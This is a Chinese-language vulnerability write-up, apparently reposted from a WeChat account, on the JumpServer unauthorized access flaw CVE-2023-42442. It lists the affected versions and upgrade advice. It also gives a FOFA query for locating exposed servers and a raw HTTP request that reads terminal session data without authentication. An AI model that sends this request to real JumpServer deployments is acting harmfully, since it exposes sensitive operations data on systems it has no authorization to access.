​JumpServer存在未授权访问漏洞(CVE-2023-42442)附POC

JumpServer存在未授权访问漏洞(CVE-2023-42442)CVE-2023-42442 附POC

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. JumpServer简介

微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

JumpServer 是全球首款开源的堡垒机,使用 GNU GPL v2.0 开源协议,是符合 4A 规范的运维安全审计系统

2.漏洞描述

Jumpserver是一款开源的堡垒主机和专业的运维安全审计系统,JumpServer存在未授权访问漏洞(CVE-2023-42442):未经身份验证的远程攻击者利用该漏洞可以访获取敏感信息。

CVE编号:CVE-2023-42442

CNNVD编号:CNNVD-202309-1115

CNVD编号:

3.影响版本

3.0.0 <= JumpServer <= 3.5.4
3.6.0 <= JumpServer <= 3.6.3

​JumpServer存在未授权访问漏洞(CVE-2023-42442)附POC

4.fofa查询语句

app="JumpServer"

5.漏洞复现

漏洞链接:https://127.0.0.1/api/v1/terminal/sessions/

漏洞数据包:

GET /api/v1/terminal/sessions/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

​JumpServer存在未授权访问漏洞(CVE-2023-42442)附POC

6.POC&EXP

关注公众号  南风漏洞复现文库 并回复  漏洞复现50  即可获得该POC工具下载地址: 

​JumpServer存在未授权访问漏洞(CVE-2023-42442)附POC

7.整改意见

1)目前官方已有可更新版本,建议受影响用户升级至:

JumpServer >= v3.5.5;

JumpServer >= v3.6.4

8.往期回顾

时空智友企业流程化管控系统文件存在任意文件上传漏洞 附POC

企望制造ERP存在远程命令执行漏洞 附POC

原文始发于微信公众号(南风漏洞复现文库):​JumpServer存在未授权访问漏洞(CVE-2023-42442)附POC

版权声明:admin 发表于 2023年9月22日 下午5:07。
转载请注明:​JumpServer存在未授权访问漏洞(CVE-2023-42442)附POC | CTF导航

相关文章

暂无评论

暂无评论...